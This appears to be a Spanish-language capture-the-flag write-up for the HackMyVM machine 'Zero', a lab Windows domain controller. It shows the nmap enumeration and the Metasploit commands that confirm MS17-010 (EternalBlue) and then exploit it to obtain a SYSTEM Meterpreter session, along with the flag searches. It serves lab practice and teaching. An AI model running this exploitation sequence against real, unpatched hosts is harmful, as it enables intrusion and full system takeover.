cd ~/blog

~/writeups/hmv/114-zero.md

114 - Zero

easy Windows hmv 11-08-2024
MS17-010 EternalBlue (CVE-2017-0143)
hackmyvm.eu/machines/machine.php?vm=Zero

~1 min de lectura


Enumeramos puertos (Domain Controller de Active Directory, zero.hmv):

 sudo nmap -sCV -Pn -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49670,49671,49694 -oN 02-targeted.txt 192.168.1.29
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 14:00 -04
Nmap scan report for 192.168.1.29
Host is up (0.00051s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: zero.hmv, ...)
445/tcp   open  microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ZERO)
...
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 ...
|   Computer name: DC01
|   Domain name: zero.hmv
|_  FQDN: DC01.zero.hmv
...

Comprobamos con Metasploit que es vulnerable a EternalBlue:

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.29
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.1.29:445      - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)

Lo explotamos con el módulo ms17_010_psexec, obteniendo directamente sesión SYSTEM:

msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.29
msf6 exploit(windows/smb/ms17_010_psexec) > set lport 1234
msf6 exploit(windows/smb/ms17_010_psexec) > run

[+] 192.168.1.29:445 - Overwrite complete... SYSTEM session obtained!
[*] Meterpreter session 1 opened ...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Con permisos SYSTEM solo resta localizar las flags:

C:\>dir /s /b "user.txt"
C:\Users\ruycr4ft\Desktop\user.txt

C:\>dir /s /b "root.txt"
C:\Users\Administrator\Desktop\root.txt

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados